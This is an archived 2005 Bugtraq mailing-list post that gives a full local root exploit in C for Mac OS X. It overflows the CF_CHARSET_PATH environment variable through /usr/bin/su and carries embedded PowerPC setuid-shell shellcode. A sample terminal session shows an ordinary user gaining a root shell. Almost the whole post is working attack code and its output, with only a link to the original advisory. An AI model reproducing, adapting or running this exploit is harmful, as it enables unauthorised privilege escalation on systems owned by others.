lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050322035258.20223.qmail@www.securityfocus.com> Date: 22 Mar 2005 03:52:58 -0000 From: Vade 79 <v9@...ehalo.deadpig.org> To: bugtraq@...urityfocus.com Subject: Mac OSX[CF_CHARSET_PATH]: local root exploit. This is simply an exploit for the iDefense adv posted today/yesterday, exploits via /usr/bin/su. original adv: www.idefense.com/application/poi/display?id=219&type=vulnerabilities original exploit: http://fakehalo.us/xosx-cf.c --- example usage --- server:/tmp v9$ id uid=502(v9) gid=502(v9) groups=502(v9) server:/tmp v9$ gcc xosx-cf.c -o xosx-cf server:/tmp v9$ ./xosx-cf (*)MacOS X[CF_CHARSET_PATH]: local root exploit. (*)by: v9@...ehalo.us, found by iDefense adv. (anon) [*] setting up the environment. [*] executing su... (press ENTER at the "Password: " prompt) Password: sh-2.05b# id uid=0(root) gid=502(v9) groups=502(v9) --- xosx-cf.c --- /*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]********* * * * by: v9@...ehalo.us (fakehalo/realhalo) * * * * found by: iDefense (anon finder) * * * * saw the advisory on bugtraq and figured i'd slap this * * together, so simple i had to. exploits via the * * /usr/bin/su binary. you must press ENTER at the * * "Password: " prompt. * ***********************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */ "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb" "\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae" "\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5" "\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3" "\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e" "\x2f\x73\x68\x58"; int main(void){ unsigned int i=0; char *buf,*env[3]; printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n"); printf("(*)by: v9@...ehalo.us, found by iDefense adv. (anon)\n\n"); if(!(buf=(char *)malloc(1100+1)))exit(1); memcpy(buf,"CF_CHARSET_PATH=",16); printf("[*] setting up the environment.\n"); for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec)); env[0]=buf; env[1]=exec; env[2]=NULL; printf("[*] executing su... (press ENTER at the \"Password: \"" " prompt)\n\n"); if(execle("/usr/bin/su","su",0,env)) printf("[!] failed executing /usr/bin/su.\n"); exit(0); }
Powered by blists - more mailing lists